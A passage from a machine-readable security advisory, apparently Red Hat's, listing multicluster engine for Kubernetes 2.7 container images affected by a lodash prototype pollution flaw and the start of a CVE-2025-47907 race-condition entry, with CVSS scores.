"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:9a23dfe4c781261e8db8fbb65517d69c3532fba5e897978b8a7765864b84b495_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:c29b2dc7510dcc147cf8460e4e39c0f2595edc4ff81f62c035333c6354776335_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:08592505c61791b614511a2c51d9963aa3277ac9e2af98954b07e47e36ca6765_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:1145c4b8c3606c2550986f1bf352835300f58d81f6c50d63846983a666602655_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:53c5fd16cd44f631ca08f6eb51e346d99950c9b4c6860743262c068074ba3c9f_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:aed4dab31c6e0d932781c631022214fdea5b28e6ccdc00abee3e006d13befe8a_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:31acda49be5c46912447113bf6133b4457f1f49270741859cb1493b65474d203_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:66c468c37631e94fcc32442e93a149caf3ad4831d1817314983dde8ba145fd25_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:d24798fdb05f2c2959b03889dff46e58c3b15d531a3750d1cd153ae4fcfda087_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:fce0a7344e9f0d86a8d5e5dbd70a3a8ef6a55567ade0a7345ffda3344d2617d6_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:04cc5c05db5bd9bd83f529523cc003c0ebe72d1ab55b2617bee8375b5f11616e_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:4ed9ab5ffc8c4fb0dc4c9faaa13e63c81dd40e2e04784bd7f48e81a0bd734a14_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:92230ad9427b8002fca17de62427089eaa409edcaa39554a96cf16c23b41b1bd_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:e8e78077943e22dfbf24b01d40f866954e39e783711a3ceab6c6f08e8e07fdce_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:5a1f7f5125b9fff4c8b415e93eaad7257af8ffb3b70823917cf0eec075484b8b_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:a47433ffe10df556b6bea4c0cc3c3f3ac508e1a9d6ab81981f7ab84afc34524c_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:ae032d3383977818eab9f396217d9de8053e6a0fe2657a21fec9b4bae58940ed_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:d2e664349d706e81882258dae2d18de73c65d09649e7ac74f5616ecb81f2ffbe_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:2a8862c66d7bba87f0ab708d1644eb7c01840fc8f5b3b7373044aff4e219e000_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:2d091748418b3f6d3cdcc4b4d773c98c8a22cac2717ed5274a6d8c612af51f71_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:3589f0bf450892dbfe4bac6c5255ebec5109e1d5d2e102dfb8e3e5894427a9b5_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:4dfb3a2b2ea2a32c5cfc770c84fba0f158d2c759d3a6559b01efd365e4a19e52_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:2bc2bb010570cb1f65205b4c6f7f470e8b2242d1401f4d0ab8ba08bdabacefeb_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:495dece80910102a98e78394ca35ee5c4703d32f705f43f9813312872dd8b528_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:86ed174f04e82706d3c5a793fc94c5f3ff78ef7a442056e9ffbfdf04543e47e8_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:a80ab7578c04779f5a91eb489efe6dfa821c2f22fad92f34864402604ae6d89a_ppc64le"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:4667db4cc9699f5e41cda6388eb7371ad9c8c73a92a7fc19115ddd48b562e56e_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:c09c8b8f588cac2b8c4b15a79de635971f002419ffc2b4d967f383160897e2dd_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:d00a17c4162336d52d47452f13d2470ddd4f9d6913759472791ee4d8bfc34d46_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:fe8b267cb2ea707fda229bae30ca074079da2909e7313eff06ba9eb2fb529237_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:76d00b37dc5c5d7bf489f55f3a41a953677449491b01c789bf7b29c789c461b7_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:a2fa219ec0da0910c1a858ac43d53288f2cf434c26fcb6cd8185e9d6f13a1ebd_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:c4e710e3ab66dfbcb3f2db4d17f73aea44ea9d2649e5f5cec94c1b51644809cf_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:c6a8bf6b7644c45a41d4c8a1c31cc08e03b6ac5ed36f562256cb1509f26a47c7_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:6ae1271bcaebb79d7dd48fa4bb89f2cf0bf450cce004899feee7d1a53d230a81_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:8ffc2f2cdfd7753c083ca083a42da60b8783d09b6817c6b22c38c91d67c0b4a5_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:9295aea24d0997fd5112e4bc6701f15e5ed2ee54f298d134aef5c9d499ad7ce5_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:fb103ee7a47badea6dfd32f698cc209bb2242dd90b51986cea6f26a03ade9516_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:8173d4f41f25103f387f1b148f9e90eba72abeccd506bfe657f6fd54cbbcf395_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:e146412fb2f0d808cf6a0faa5f39e54032cd4b6c594d67795bb81883ebf0b386_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:ec486aa31c687d3f9e8dffe7ae5018b9ce3cc8795a91765c237eb72b2f6984c5_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:fb47b5a6d4fe1c966eb29109c27a5e323b6b4e665a2754f234979cef4bfc6fc2_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:111a02c966b528a619c9ad5942151e64374e0c57d80be21f91c0f41469c63c19_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:1396ea60940f7dfc33d67d918dd82d62f780d0e837e12785ccec2ada30ce3f93_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:4c393e89346494a9abd31c664e977edacd6ca8bf1f1c28c2aa9a6625f0d02d9f_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:ca4d807da014acefb7e963000cd2431352087dd908491ff4189592f53dec93ff_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:694ac8be10bee34d7c34fdcabde7dfdf1558053cac0479eca4677971c09589e6_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:c0b2cdac26577de087dfd119ff0e2f996f211cd9021bed43d01e286fe166642d_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:d35fb00e5d71a79ec679d7bb9911c4974ca4ebe334e76461270594feda1a7378_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:dabdf0f6fec7ebd5b86034281ae740aea0e77146e33bdd04c01590745b68ea8e_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:6e44a95fd942fad8a4f43379d100d2f11808caef975afbafe244543b2f33e2b1_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:bbcbedae29915aecb2d0722d16a5265b214714b2e8695f4885395982507950f8_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:f02386b7e2476ab45ef771bdc6034ba4148bdbbf30cb95e2110a681adaeaa03e_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:f87238bec802fb8e8aa257f73eb32f3b3cacf1564677e594ca0d165ed2c0a021_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:2dc8a21ac845a94b55a048554052666910cd7e5fc2f9731d62c8911f18ac3fcb_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:4cb50e9064955ace00ee9bbc0592f5e073affa7a29d0d8a119b67bb8fc9d5a20_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:674b94c6913ca04eb711ccf438f24fe22d7332c8f7ca733a8d0e6b5b5b3f99ab_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:dc747542c832d5868ce34b622f3cb73a3376beab272bdb156b4a5d29439173a8_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:04ac93d513d3d10d83de367893012f4098b281c89d773d5799393b1ecb184658_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:5b51bbe361be033ce654374dbf65f15a7449072207d8350959becd9921a7da1a_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:89d53a8fca9a27f188f13631f4416eb9c8460868e095ed207f55591c76ea0acf_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:e5ab3e9b45628c867d6b8babec0e2dc9b32d1b9bdf5aae9a74ac0e45b553355f_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:1108dd8708d80e09fcc6cf4ecb2ec3d076f1fd22814b6c6ce2b4236143779527_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:4b8c28da26c5fcc04cfe2072965fdb957fd2ebc514afe8ab46c79d625dc7dd46_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:8cbfa37103a4fb66ce05ae0a001412af7556b61b4079406c82bb82a1c7bf841a_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:bf00fb14cf15607b90bfd5719b9707081b9f4696d4296944586fc839e0210d9b_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:2efa3dbf99e5be1f8eb4f169f5f2229b338fdf2d2c72b9c0b0da9392e612cc5f_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:7141546552e4237c8b118044c3cc310ddfee917b547c36857a291c33e185bcc1_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:8aaa0f89e8e6ad810632240a7e032b6e673f69e1e4018ab6b36dd87de69ceeb8_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:d07f47405187ce8f4b91686b48d4ed71336ff2bd9218b88c31f52ddc22db9238_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:47c835ad25efcfa42534a1daf7235b18b318030546e81c784027c62ab665b896_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:50276a56714a1bc1aabedbadb7f702913412f6a20db8b110986436845ee2f3c7_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:705746f64a46c4990cc3ec16236c41c64352493fdeb9f7fbbc34353ff111e267_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:9358b7c24e4c4f8e72266af077352af1af3ba61e266087cf55b7dc9ea0eddcb9_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:466a01f1457e47e5b418c8e1d87cc2d92e100d635e6cbbc6224039b71d413105_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:5d81a9b6f31e72d5beddec8128e693ecacd03bbbb6640a626e06a9b4b033c47e_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:6d05352bd35932dc05bd12a06890b7e99594773791e0c8edd8492a835155acb3_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:70ad5cb3532bde1dd5a9337a7064dd8e1ff1799bcb017a2d2e6536a932ce22dc_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:0c554f87aa16a5c7a6c6ee78886787b055fad40c557f1cbaa5996db9a09b41ce_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:618edff2bf45eea71e6f3e7f7b24e95f10314b146ff45ac72ea8cabb1cb373d4_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:92d36152258c9d926be0bdcfac34995f22eec3518111fbf2c768b660129f5440_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:cacde4ea2c1d98290f68b7ad0a3ca31582710a3b64442649baace5b8ee953f89_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:365a26e2d054aefe147ad411da6014e76c9d4f4646a8382b9be3f3eeb35fc6cf_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:775d0fbe7f2a3d4abdbb751331dbdc7457ff489e1d2aa32c93b7bec4dff2eeb4_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:d0062eaae78adb437020762d1a3e555c2b5bc0fe05da89716b2e8acf673ff661_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:db93b4a928c940e66ea4ada9f69f3b20f6bf4d64146df89d8e9e5a66acd2a03c_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:0b57da9ddb495d659da29e2a699d5fedb720056f72f77e426c40c1a7bae79a87_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:52625c24cfe3921bc6c00090b150b36544410b9b877b43e148abf634cdb8c0e9_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:91c20f61a7e054ac5b53b8b8ad06f110ed3db0ace9258fd9e2b3fa03f59f11ab_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:e91c55697e0d95b8c9265d0072c5b80faed4dd9dfdfeb87443f98f473fcf42bc_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:06109d274a92145cc11d4f30ed877d2a233a4852e3537d87b117e6682b911b20_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:4f7e7a8764b018c6d51c0700a76f0dcedcf5ffe85f28f66c214e36455105e32f_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:d6afe401727d8b252009042c03319fb6a9bc2cfd2ffba5e5518c9a22e91692de_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:dc366eaa2c3f3f72003f928262c03900983aaac8352615715d72bf5223b59a94_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:2a1963aa5fb3ee452084510bac3792ae508b5c9eeb41c676e13f2551d7c88d60_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:9774a696206b422b52b5f1082750d7e62cccf3c7ee0e28ec156b560cf1acebb0_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:99d0b694cee080c924c2e2294af4a0a36f669129516f205b5e13a3eabd1ee019_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:a99ef9cd8f37bbf76d5bb6b81865547af9ec456b0204e36995ff86960abcf1f5_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:1b2c836336117c0e04dc30101898117b68edf6489ad9da955453cb6e4491bb33_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:259049072cf889d7b72fdae5b5a17bd2d4d6fd176cb1da4274b70f02c854dea9_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:90a96bb156d096a0c55fcf27b2dc0176e56c9b7388697ed17d9bbb257c39a3aa_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:f3aa3d1b579275dcdf403867cc9b140f34cfcdc099d4b87819ef7f4978af2be1_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:21b52ad7c77dd21bc0a9a20a1ae6e2fc5d236b39e16dbfa82158ec80ef2846d4_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:6a83c52ba828f45e84550ba702ba86d5746057194d389b6959ab7486e8615b16_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:b22d17d474876f6079c86518dbc04e692ade54067cd4fc0c5660d8a1ba0937cf_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:b34be4d5652efaee930bd26536547fd1fc04dda4060605dabc276e59f96a0a0c_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:6ab181004adafad8a5cd0155da9e107ab3989ef97007e69decb7238a9b0597da_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:7782c711aff60d9ac0d8297431eabca6945752292b16beecdb52303ad22f1553_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:9a23dfe4c781261e8db8fbb65517d69c3532fba5e897978b8a7765864b84b495_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:c29b2dc7510dcc147cf8460e4e39c0f2595edc4ff81f62c035333c6354776335_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:08592505c61791b614511a2c51d9963aa3277ac9e2af98954b07e47e36ca6765_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:1145c4b8c3606c2550986f1bf352835300f58d81f6c50d63846983a666602655_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:53c5fd16cd44f631ca08f6eb51e346d99950c9b4c6860743262c068074ba3c9f_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:aed4dab31c6e0d932781c631022214fdea5b28e6ccdc00abee3e006d13befe8a_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:31acda49be5c46912447113bf6133b4457f1f49270741859cb1493b65474d203_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:66c468c37631e94fcc32442e93a149caf3ad4831d1817314983dde8ba145fd25_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:d24798fdb05f2c2959b03889dff46e58c3b15d531a3750d1cd153ae4fcfda087_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:fce0a7344e9f0d86a8d5e5dbd70a3a8ef6a55567ade0a7345ffda3344d2617d6_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:04cc5c05db5bd9bd83f529523cc003c0ebe72d1ab55b2617bee8375b5f11616e_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:4ed9ab5ffc8c4fb0dc4c9faaa13e63c81dd40e2e04784bd7f48e81a0bd734a14_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:92230ad9427b8002fca17de62427089eaa409edcaa39554a96cf16c23b41b1bd_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:e8e78077943e22dfbf24b01d40f866954e39e783711a3ceab6c6f08e8e07fdce_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:5a1f7f5125b9fff4c8b415e93eaad7257af8ffb3b70823917cf0eec075484b8b_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:a47433ffe10df556b6bea4c0cc3c3f3ac508e1a9d6ab81981f7ab84afc34524c_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:ae032d3383977818eab9f396217d9de8053e6a0fe2657a21fec9b4bae58940ed_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:d2e664349d706e81882258dae2d18de73c65d09649e7ac74f5616ecb81f2ffbe_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:2a8862c66d7bba87f0ab708d1644eb7c01840fc8f5b3b7373044aff4e219e000_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:2d091748418b3f6d3cdcc4b4d773c98c8a22cac2717ed5274a6d8c612af51f71_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:3589f0bf450892dbfe4bac6c5255ebec5109e1d5d2e102dfb8e3e5894427a9b5_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:4dfb3a2b2ea2a32c5cfc770c84fba0f158d2c759d3a6559b01efd365e4a19e52_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:2bc2bb010570cb1f65205b4c6f7f470e8b2242d1401f4d0ab8ba08bdabacefeb_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:495dece80910102a98e78394ca35ee5c4703d32f705f43f9813312872dd8b528_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:86ed174f04e82706d3c5a793fc94c5f3ff78ef7a442056e9ffbfdf04543e47e8_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:a80ab7578c04779f5a91eb489efe6dfa821c2f22fad92f34864402604ae6d89a_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "lodash: prototype pollution in _.unset and _.omit functions"
},
{
"cve": "CVE-2025-47907",
"cwe": {
"id": "CWE-362",
"name": "Concurrent Execution using Shared Resource with Improper Synchronization (\u0027Race Condition\u0027)"
},
"discovery_date": "2025-08-07T16:01:06.247481+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:4667db4cc9699f5e41cda6388eb7371ad9c8c73a92a7fc19115ddd48b562e56e_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:c09c8b8f588cac2b8c4b15a79de635971f002419ffc2b4d967f383160897e2dd_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:d00a17c4162336d52d47452f13d2470ddd4f9d6913759472791ee4d8bfc34d46_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:fe8b267cb2ea707fda229bae30ca074079da2909e7313eff06ba9eb2fb529237_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:6ae1271bcaebb79d7dd48fa4bb89f2cf0bf450cce004899feee7d1a53d230a81_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:8ffc2f2cdfd7753c083ca083a42da60b8783d09b6817c6b22c38c91d67c0b4a5_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:9295aea24d0997fd5112e4bc6701f15e5ed2ee54f298d134aef5c9d499ad7ce5_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:fb103ee7a47badea6dfd32f698cc209bb2242dd90b51986cea6f26a03ade9516_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:8173d4f41f25103f387f1b148f9e90eba72abeccd506bfe657f6fd54cbbcf395_arm64",
